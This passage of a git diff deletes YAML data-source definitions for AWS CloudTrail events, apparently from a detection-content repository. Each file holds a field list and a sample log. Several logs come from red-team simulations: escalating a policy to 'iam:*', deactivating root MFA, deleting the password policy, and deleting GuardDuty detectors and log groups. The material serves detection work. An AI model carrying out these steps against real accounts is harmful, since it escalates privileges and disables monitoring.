"ruleAction": "allow", "icmpTypeCode": {}, "portRange": {}, "aclProtocol": "-1", "cidrBlock": "0.0.0.0/0"}, "responseElements": {"requestId": "d29c9c32-3a72-48d3-b612-6ba795e9ec64", "_return": true}, "requestID": "d29c9c32-3a72-48d3-b612-6ba795e9ec64", "eventID": "6d1ce00e-4099-463c-8a4d-2af2fb2178ba", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_CreatePolicyVersion.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_CreatePolicyVersion.yml
deleted file mode 100644
index 265c1b46c5..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_CreatePolicyVersion.yml
+++ /dev/null
@@ -1,80 +0,0 @@
-event_name: AWS CloudTrail CreatePolicyVersion
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.policyArn
-- requestParameters.policyDocument
-- requestParameters.setAsDefault
-- responseElements.policyVersion.createDate
-- responseElements.policyVersion.isDefaultVersion
-- responseElements.policyVersion.versionId
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLNMCDVJZAY", "arn": "arn:aws:iam::111111111111:user/rhino_escalate", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLHSQZPZFZ", "userName": "rhino_escalate"}, "eventTime": "2021-02-23T00:02:30Z", "eventSource": "iam.amazonaws.com", "eventName": "CreatePolicyVersion", "awsRegion": "us-east-1", "sourceIPAddress": "73.15.72.101", "userAgent": "aws-cli/2.0.62 Python/3.9.0 Darwin/19.6.0 source/x86_64 command/iam.create-policy-version", "requestParameters": {"policyArn": "arn:aws:iam::111111111111:policy/rhino_escalate", "policyDocument": "{\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Sid\": \"AllowEverything\",\n \"Effect\": \"Allow\",\n \"Action\": \"iam:*\",\n \"Resource\": \"*\"\n }\n ]\n }", "setAsDefault": true}, "responseElements": {"policyVersion": {"versionId": "v2", "isDefaultVersion": true, "createDate": "Feb 23, 2021 12:02:30 AM"}}, "requestID": "fa42b4b2-f34a-4673-8f9f-b25cf1f5005a", "eventID": "33149175-90fd-4cff-a43b-408e4f848c1c", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateSnapshot.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_CreateSnapshot.yml
deleted file mode 100644
index db119fa8cc..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateSnapshot.yml
+++ /dev/null
@@ -1,89 +0,0 @@
-event_name: AWS CloudTrail CreateSnapshot
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.tagSpecificationSet.items{}.resourceType
-- requestParameters.tagSpecificationSet.items{}.tags{}.key
-- requestParameters.tagSpecificationSet.items{}.tags{}.value
-- requestParameters.volumeId
-- responseElements.encrypted
-- responseElements.ownerId
-- responseElements.requestId
-- responseElements.snapshotId
-- responseElements.startTime
-- responseElements.status
-- responseElements.tagSet.items{}.key
-- responseElements.tagSet.items{}.value
-- responseElements.volumeId
-- responseElements.volumeSize
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLCNEAQXWZV", "arn": "arn:aws:iam::111111111111:user/bhavin_console", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLF5EAXXXX", "userName": "bhavin_console"}, "eventTime": "2023-03-20T22:31:18Z", "eventSource": "ec2.amazonaws.com", "eventName": "CreateSnapshot", "awsRegion": "us-west-2", "sourceIPAddress": "72.135.1.1", "userAgent": "APN/1.0 HashiCorp/1.0 Terraform/1.1.2 (+https://www.terraform.io) terraform-provider-aws/3.76.1 (+https://registry.terraform.io/providers/hashicorp/aws) aws-sdk-go/1.44.157 (go1.19.3; darwin; amd64) stratus-red-team_46665bb8-dc15-4aba-a5ad-a362772b3f0d HashiCorp-terraform-exec/0.17.3", "requestParameters": {"volumeId": "vol-0363e53e12f67c9b7", "tagSpecificationSet": {"items": [{"resourceType": "snapshot", "tags": [{"key": "StratusRedTeam", "value": "true"}]}]}}, "responseElements": {"requestId": "fefed928-d461-45f0-802f-a99d94c833a8", "snapshotId": "snap-02effb3bb62786b18", "volumeId": "vol-0363e53e12f67c9b7", "status": "pending", "startTime": 1679351478226, "ownerId": "111111111111", "volumeSize": "1", "encrypted": false, "tagSet": {"items": [{"key": "StratusRedTeam", "value": "true"}]}}, "requestID": "fefed928-d461-45f0-802f-a99d94c833a8", "eventID": "2d52d141-d1e6-4d1f-a380-1461c1bf9f83", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "ec2.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateTask.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_CreateTask.yml
deleted file mode 100644
index 853efff21e..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateTask.yml
+++ /dev/null
@@ -1,88 +0,0 @@
-event_name: AWS CloudTrail CreateTask
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.cloudWatchLogGroupArn
-- requestParameters.destinationLocationArn
-- requestParameters.options.logLevel
-- requestParameters.options.verifyMode
-- requestParameters.schedule.scheduleExpression
-- requestParameters.sourceLocationArn
-- responseElements.taskArn
-- sessionCredentialFromConsole
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAYTOGP2RLDF6WQQQQQ:abc@acme.com", "arn": "arn:aws:sts::111111111111:assumed-role/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f/abc@acme.com", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLOB2GM111", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLDF6WQQQQQ", "arn": "arn:aws:iam::111111111111:role/aws-reserved/sso.amazonaws.com/us-west-2/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f", "accountId": "111111111111", "userName": "AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f"}, "webIdFederationData": {}, "attributes": {"creationDate": "2023-03-14T21:53:15Z", "mfaAuthenticated": "false"}}}, "eventTime": "2023-03-14T22:05:36Z", "eventSource": "datasync.amazonaws.com", "eventName": "CreateTask", "awsRegion": "us-west-2", "sourceIPAddress": "1.1.1.1", "userAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36", "requestParameters": {"sourceLocationArn": "arn:aws:datasync:us-west-2:111111111111:location/loc-0921d426f7955d416", "destinationLocationArn": "arn:aws:datasync:us-west-1:111111111111:location/loc-0b94cf657c358ef06", "cloudWatchLogGroupArn": "arn:aws:logs:us-west-2:111111111111:log-group:/aws/datasync", "options": {"verifyMode": "ONLY_FILES_TRANSFERRED", "logLevel": "BASIC"}, "excludes": [], "schedule": {"scheduleExpression": "cron(6 * * * ? 
*)"}, "tags": [], "includes": []}, "responseElements": {"taskArn": "arn:aws:datasync:us-west-2:111111111111:task/task-0c77dc0d4b0792ce6"}, "requestID": "de5f4282-aa2b-49b8-8d1b-c3bdb11e2fba", "eventID": "def4cd05-f845-4aec-bc96-07d6ce420d16", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "datasync.us-west-2.amazonaws.com"}, "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateVirtualMFADevice.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_CreateVirtualMFADevice.yml
deleted file mode 100644
index 07afead5c3..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateVirtualMFADevice.yml
+++ /dev/null
@@ -1,78 +0,0 @@
-event_name: AWS CloudTrail CreateVirtualMFADevice
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.path
-- requestParameters.virtualMFADeviceName
-- responseElements.virtualMFADevice.serialNumber
-- sessionCredentialFromConsole
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId": "140429656527", "arn": "arn:aws:iam::140429656527:root", "accountId": "140429656527", "accessKeyId": "ASIASBMSCQHH2YXNXJBU", "sessionContext": {"sessionIssuer": {}, "webIdFederationData": {}, "attributes": {"creationDate": "2023-01-30T22:59:36Z", "mfaAuthenticated": "false"}}}, "eventTime": "2023-01-30T23:02:23Z", "eventSource": "iam.amazonaws.com", "eventName": "CreateVirtualMFADevice", "awsRegion": "us-east-1", "sourceIPAddress": "23.93.193.6", "userAgent": "AWS Internal", "requestParameters": {"path": "/", "virtualMFADeviceName": "strt_mfa_2"}, "responseElements": {"virtualMFADevice": {"serialNumber": "arn:aws:iam::140429656527:mfa/strt_mfa_2"}}, "requestID": "2fbe2074-55f8-4ec6-ad32-0b250803cf46", "eventID": "7e1c493d-c3c3-4f4a-ae4f-8cdd38970027", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "140429656527", "eventCategory": "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeactivateMFADevice.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeactivateMFADevice.yml
deleted file mode 100644
index a7b5a75609..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeactivateMFADevice.yml
+++ /dev/null
@@ -1,78 +0,0 @@
-event_name: AWS CloudTrail DeactivateMFADevice
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.serialNumber
-- requestParameters.userName
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId": "111111111111", "arn": "arn:aws:iam::111111111111:root", "accountId": "111111111111", "accessKeyId": "ASIASBMSCQHHWAIHMHUX", "sessionContext": {"sessionIssuer": {}, "webIdFederationData": {}, "attributes": {"creationDate": "2022-10-04T16:13:23Z", "mfaAuthenticated": "true"}}}, "eventTime": "2022-10-04T16:13:45Z", "eventSource": "iam.amazonaws.com", "eventName": "DeactivateMFADevice", "awsRegion": "us-east-1", "sourceIPAddress": "142.254.89.27", "userAgent": "Coral/Netty4", "requestParameters": {"userName": "AWS ROOT USER", "serialNumber": "arn:aws:iam::111111111111:mfa/root-account-mfa-device"}, "responseElements": null, "requestID": "d27cfb15-34b4-4c16-82bc-a55d15b4e47d", "eventID": "bfe9fd91-0b4d-470a-9c03-77839151806d", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteAccountPasswordPolicy.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteAccountPasswordPolicy.yml
deleted file mode 100644
index 2b007962f4..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteAccountPasswordPolicy.yml
+++ /dev/null
@@ -1,79 +0,0 @@
-event_name: AWS CloudTrail DeleteAccountPasswordPolicy
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- desc
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters
-- responseElements
-- sessionCredentialFromConsole
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId": "111111111111", "arn": "arn:aws:iam::111111111111:root", "accountId": "111111111111", "accessKeyId": "ASIASBMSCQHHWMDJXSE6", "sessionContext": {"sessionIssuer": {}, "webIdFederationData": {}, "attributes": {"creationDate": "2023-01-26T18:44:21Z", "mfaAuthenticated": "false"}}}, "eventTime": "2023-01-26T21:23:22Z", "eventSource": "iam.amazonaws.com", "eventName": "DeleteAccountPasswordPolicy", "awsRegion": "us-east-1", "sourceIPAddress": "23.93.193.7", "userAgent": "AWS Internal", "requestParameters": null, "responseElements": null, "requestID": "e3616938-1aac-4abd-9ea3-3b0367b85082", "eventID": "bbd8cb02-22ba-4d1b-b23d-b82975463376", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteDetector.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteDetector.yml
deleted file mode 100644
index 2cc31f6a88..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteDetector.yml
+++ /dev/null
@@ -1,75 +0,0 @@
-event_name: AWS CloudTrail DeleteDetector
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.detectorId
-- responseElements.__type
-- responseElements.message
-- result_id
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName": "gowthamaraj_cli"}, "eventTime": "2022-07-21T20:27:54Z", "eventSource": "guardduty.amazonaws.com", "eventName": "DeleteDetector", "awsRegion": "us-west-2", "sourceIPAddress": "67.171.71.185", "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off command/guardduty.delete-detector", "errorCode": "BadRequestException", "requestParameters": {"detectorId": "123"}, "responseElements": {"message": "The request is rejected because the parameter detectorId has an invalid value.", "__type": "InvalidInputException"}, "requestID": "1e832076-d7a8-432b-b0df-54ba62f6b62c", "eventID": "c1367a2f-8910-4e64-9256-a854d2e9f37d", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteGroup.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteGroup.yml
deleted file mode 100644
index 1a629908b2..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteGroup.yml
+++ /dev/null
@@ -1,80 +0,0 @@
-event_name: AWS CloudTrail DeleteGroup
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- errorMessage
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- reason
-- recipientAccountId
-- region
-- requestID
-- requestParameters.groupName
-- responseElements
-- result
-- result_id
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::121522247101:user/bhavin_cli", "accountId": "121522247101", "accessKeyId": "AKIAYTOGP2RLLAA6NJUM", "userName": "bhavin_cli"}, "eventTime": "2021-04-07T00:17:50Z", "eventSource": "iam.amazonaws.com", "eventName": "DeleteGroup", "awsRegion": "us-east-1", "sourceIPAddress": "12.12.12.20", "userAgent": "aws-cli/2.0.62 Python/3.9.2 Darwin/19.6.0 source/x86_64 command/iam.delete-group", "errorCode": "NoSuchEntityException", "errorMessage": "The group with name AtomicRedTeam_Victim cannot be found.", "requestParameters": {"groupName": "AtomicRedTeam_Victim"}, "responseElements": null, "requestID": "15684d3b-a8c5-4334-a996-16619e901c17", "eventID": "ab65dca3-3d28-41f4-9f99-443606cc49fe", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "121522247101"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteIPSet.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteIPSet.yml
deleted file mode 100644
index dd17f3aa61..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteIPSet.yml
+++ /dev/null
@@ -1,76 +0,0 @@
-event_name: AWS CloudTrail DeleteIPSet
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.detectorId
-- requestParameters.ipSetId
-- responseElements.__type
-- responseElements.message
-- result_id
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLKQ3U2PDY", "userName": "bhavin_cli"}, "eventTime": "2022-07-26T23:14:57Z", "eventSource": "guardduty.amazonaws.com", "eventName": "DeleteIPSet", "awsRegion": "us-west-2", "sourceIPAddress": "142.254.89.27", "userAgent": "aws-cli/2.0.62 Python/3.9.2 Darwin/21.5.0 source/x86_64 command/guardduty.delete-ip-set", "errorCode": "BadRequestException", "requestParameters": {"detectorId": "11111", "ipSetId": "1111"}, "responseElements": {"message": "The request is rejected because the parameter detectorId has an invalid value.", "__type": "InvalidInputException"}, "requestID": "70d36916-4ce7-4b6e-9226-9da47d58d554", "eventID": "884dc529-d98f-4529-bfa1-8cdd6c06d02f", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteLogGroup.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteLogGroup.yml
deleted file mode 100644
index c90eec17ab..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteLogGroup.yml
+++ /dev/null
@@ -1,77 +0,0 @@
-event_name: AWS CloudTrail DeleteLogGroup
-fields:
-- _time
-- apiVersion
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.logGroupName
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName": "gowthamaraj_cli"}, "eventTime": "2022-07-19T08:58:48Z", "eventSource": "logs.amazonaws.com", "eventName": "DeleteLogGroup", "awsRegion": "us-west-2", "sourceIPAddress": "67.171.71.185", "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off command/logs.delete-log-group", "requestParameters": {"logGroupName": "test-logs"}, "responseElements": null, "requestID": "76089b03-d749-4f83-bc0e-b857c83bba5f", "eventID": "5aba96c4-e7f9-4e4f-b5e6-49694162195d", "readOnly": false, "eventType": "AwsApiCall", "apiVersion": "20140328", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "logs.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteLogStream.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteLogStream.yml
deleted file mode 100644
index 24024042dc..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteLogStream.yml
+++ /dev/null
@@ -1,78 +0,0 @@
-event_name: AWS CloudTrail DeleteLogStream
-fields:
-- _time
-- apiVersion
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
